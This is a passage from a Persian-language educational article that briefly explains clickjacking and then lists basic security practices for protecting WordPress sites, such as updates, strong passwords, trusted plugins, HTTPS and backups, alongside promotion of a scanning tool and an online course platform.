کلیک‌جکینگ یا کلیک‌هایجکینگ، نوعی تکنیک خرابکارانه محسوب می‌شود. مهاجم در این تکنیک، دکمه، لینک یا تصویری را با استفاده از پیوندی تحمیل‌شده (به‌طور شفاف یا مبهم) هایجک می‌کند که می‌داند شما روی آن کلیک می‌کند. هدف این حمله، مجبور‌کردن شما به کلیک روی لینکی نامرئی، به‌جای المان مشخصی در صفحه، است. در نتیجه، مهاجم می‌تواند دستورهای خطرناکی را اجرا کرده یا به اطلاعات محرمانه دست یابد. کاربران پلسک وقتی می‌توانند قربانی این جمله شوند که این کنترل پنل در آی‌فریم سایت‌های مخرب باز می‌شود.

دوره پیشنهادی: آموزش طراحی سایت مقدماتی

نکاتی برای جلوگیری از هک‌ شدن وردپرس

برای جلوگیری از ابتلای وبسایت و مراقبت از آن در برابر این نوع حملات، توصیه می‌شود که از افزونه و قالب‌های معتبر استفاده کنید. راه‌حل‌هایی وجود دارد که جامعه وردپرسی‌ها قبلا تست کرده‌اند و با قالب‌های انتخابی شما سازگار هستند. تمیزکردن سایت وردپرسی هک‌شده، دردناک و نیازمند مداخله‌ای حرفه‌ای است. WPHackedHelp می‌تواند وبسایت شما را از لحاظ خطرات امنیتی بررسی کند. برای مثال، این ابزار به‌دنبال کد مخرب، لینک مشکوک، ریدایرکت مشکوک، نسخه وردپرس و غیره می‌گردد.

ضمنا، طبیعی است که وردپرس مورد هدف بسیاری از حملات قرار بگیرد. این نرم‌افزار، تقریبا روی یک سوم از وبسایت‌های اینترنتی نصب شده‌ است. با این‌حال، می‌توانید برای محافظت از خود در برابر خطرات احتمالی چند قدم محکم بردارید. چند نکته پایه و اساسی در این مورد:

1. آی‌دی پیشفرض مدیریت را در هنگام نصب وردپرس، تغییر دهید.
2. دسترسی به وبسایت را محدود کنید. آدرس‌های آی‌پی متصل به ادمین وردپرس را مسدود کرده یا فقط فهرستی از آی‌پی‌های مطمئن را در وایت‌لیست قرار دهید.
3. به‌روزرسانی‌های وردپرس را به محض انتشار، نصب کنید.
4. از نسخه‌ مناسب و به‌روز php استفاده کنید.
5. رمز عبور قدرتمندی تعریف کنید. حروف بزرگ، کوچک، اعداد و کاراکترها را در آن به‌کار ببرید.
6. قالب‌ها را فقط از منابع معتبر و توصیه‌شده بگیرید.
7. نکته بالا را برای نصب افزونه‌ها نیز رعایت کنید. استفاده از افزونه‌های تاریخ گذشته، قدیمی و بدون پشتیبانی را دور بریزید.

اگر وردپرس نشان می‌دهد که سال‌هاست افزونه‌ای به‌روز نشده، احتمال وجود رخنه امنیتی در آن بالا می‌رود.

1. قبل از نصب افزونه، تحقیقات کافی انجام داده و از اعتبار آن اطمینان حاصل کنید.
2. افزونه‌های بدون استفاده خود را غیرفعال و پاک کنید.
3. صرفا افزونه‌هایی را استفاده کنید که به آن‌ها نیاز دارید.
4. از پروتکل امن HTTPS به‌جای HTTP بهره ببرید.
5. وبسایت خود را با استفاده از WP Hacked Help اسکن کنید.
6. به‌طور منظم از وبسایت خود نسخه پشتیبان بگیرید.
7. حساب‌های کاربری قدیمی و غیرفعال را از وردپرس غیرفعال یا حذف کنید.
8. اجازه ندهید بازدیدکنندگان بدون تایید نظر بگذارند.
9. اجازه بارگذاری فایل از وبسایت را ندهید.
10. فعالیت کاربران را به‌طور هفتگی مورد بررسی قرار دهید.

مکتب‌خونه، پلتفرمی برای دیدن آموزش‌های بیشتر وردپرس

وردپرس و هک دو مقوله به‌هم پیوسته و جدانشدنی هستند. در مقاله آموزش هک وردپرس، سعی کردیم تا چشمه‌ای از مشکلات امنیتی و راه‌حل آن‌ها را به شما نشان دهیم. اگر می‌خواهید درباره نرم‌افزار وردپرس یا مباحث مربوط به آموزش هک و آموزش وردپرس بیشتر بدانید، پلتفرم آموزشی مکتب‌خونه پیشنهاد ما به شماست.